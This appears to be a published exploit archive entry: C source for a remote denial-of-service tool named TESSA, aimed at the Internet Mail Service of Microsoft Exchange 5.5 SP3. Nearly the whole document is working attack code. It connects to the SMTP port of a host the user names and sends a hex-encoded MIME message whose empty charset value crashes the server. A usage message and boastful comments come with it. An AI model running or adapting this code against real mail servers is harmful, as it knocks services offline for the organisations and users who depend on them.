Remote denial of service exploit for Microsoft Exchange 5.5 SP3 Internet Mail Service and Information Store. The bug is in the handling of a line containing Content="".
0c9cfdbafe736d4492e5824460e8cf1c11123d2a6f395721ed470ff9d5905c32
/*
* Okay, now THIS is lame.
*
* TESSA: The Exchange Simple Service Assimilator
* ----------------------------------------------
*
* This will crash a 'Microsoft Exchange 5.5 SP3 Internet Mail Service
* and Information Store' (what's in a name)
*
* For people who got a little brains.. translate the shellcode, it will become
* more clear for you.
*
* by incubus <incubus@securax.org> http://securax.org/incubus
*
* All my love: Tessa.
* Respect: #securax@efnet, mr_magnet, axess, f0bic, lamagra and steven.
*
* Respect and words of thank to Noam @ Beyondsecurity.
*
*/
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#define SMTP_PORT 25
int main(int argc, char **argv){
int i, sock, result;
unsigned int port;
struct sockaddr_in name;
struct hostent *hostinfo;
/* wooooow dude, check out my ub3rl33t sh3llk0de */
/* man, i do really feel like a haX0r kiddie now */
char buf[384] = "\x48\x45\x4c\x4f\x0d\x0a\x4d\x41\x49\x4c\x20\x46\x52\x4f\x4d\x3a"
"\x20\x72\x6f\x6f\x74\x40\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e"
"\x63\x6f\x6d\x0d\x0a\x52\x43\x50\x54\x20\x54\x4f\x3a\x20\x61\x64"
"\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x0d\x0a\x44\x41\x54"
"\x41\x0d\x0a\x0d\x0a\x4d\x49\x4d\x45\x2d\x56\x65\x72\x73\x69\x6f"
"\x6e\x3a\x20\x31\x2e\x30\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
"\x54\x79\x70\x65\x3a\x20\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f"
"\x61\x6c\x74\x65\x72\x6e\x61\x74\x69\x76\x65\x3b\x0d\x0a\x0d\x0a"
"\x20\x20\x20\x20\x20\x20\x62\x6f\x75\x6e\x64\x61\x72\x79\x3d\x22"
"\x3d\x5f\x20\x42\x6f\x75\x6e\x64\x61\x72\x79\x20\x31\x2d\x4b\x54"
"\x77\x45\x76\x34\x6a\x59\x38\x34\x48\x6b\x22\x0d\x0a\x0d\x0a\x20"
"\x2d\x2d\x3d\x5f\x20\x42\x6f\x75\x6e\x64\x61\x72\x79\x20\x31\x2d"
"\x4b\x54\x77\x45\x76\x34\x6a\x59\x38\x34\x48\x6b\x0d\x0a\x0d\x0a"
"\x20\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74"
"\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x3b\x0d\x0a\x0d\x0a\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x63\x68\x61\x72\x73\x65\x74\x20\x3d"
"\x20\x22\x22\x0d\x0a\x0d\x0a\x20\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
"\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e"
"\x67\x3a\x20\x37\x62\x69\x74\x0d\x0a\x0d\x0a\x20\x54\x68\x69\x73"
"\x20\x6d\x65\x73\x73\x61\x67\x65\x20\x69\x73\x20\x74\x65\x73\x74"
"\x0d\x0a\x0d\x0a\x20\x2d\x2d\x3d\x5f\x20\x42\x6f\x75\x6e\x64\x61"
"\x72\x79\x20\x31\x2d\x4b\x54\x77\x45\x76\x34\x6a\x59\x38\x34\x48"
"\x6b\x2d\x2d\x0d\x0a\x20\x0d\x0a\x20\x2e\x0d\x0a\x20\x0d\x0a\x20"
"\x0d\x0a\x51\x55\x49\x54"; /* phew.. */
if (argc < 2){
fprintf (stdout, "Microsoft Exchange 5.5 SP3 Denial of Service\n--------------------------------------------\n");
fprintf (stdout, "You better do %s <ipaddress or hostname> <port>\n", argv[0]);
fprintf (stdout, "by incubus <incubus@securax.org>\n\n");
exit(0);
}
if (argc < 3) port = SMTP_PORT;
else port = atoi(argv[2]);
hostinfo=gethostbyname(argv[1]);
if (!hostinfo){
herror("Damn!"); exit(-1);
}
name.sin_family=AF_INET;
name.sin_port=htons(port);
name.sin_addr=*(struct in_addr *)hostinfo->h_addr;
sock=socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) { herror("Damn!"); exit(-1); }
result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
if (result != 0) { herror("Damn!"); exit(-1); }
send(sock, buf, sizeof(buf), 0);
fprintf (stdout, "Done\n");
close(sock);
}
}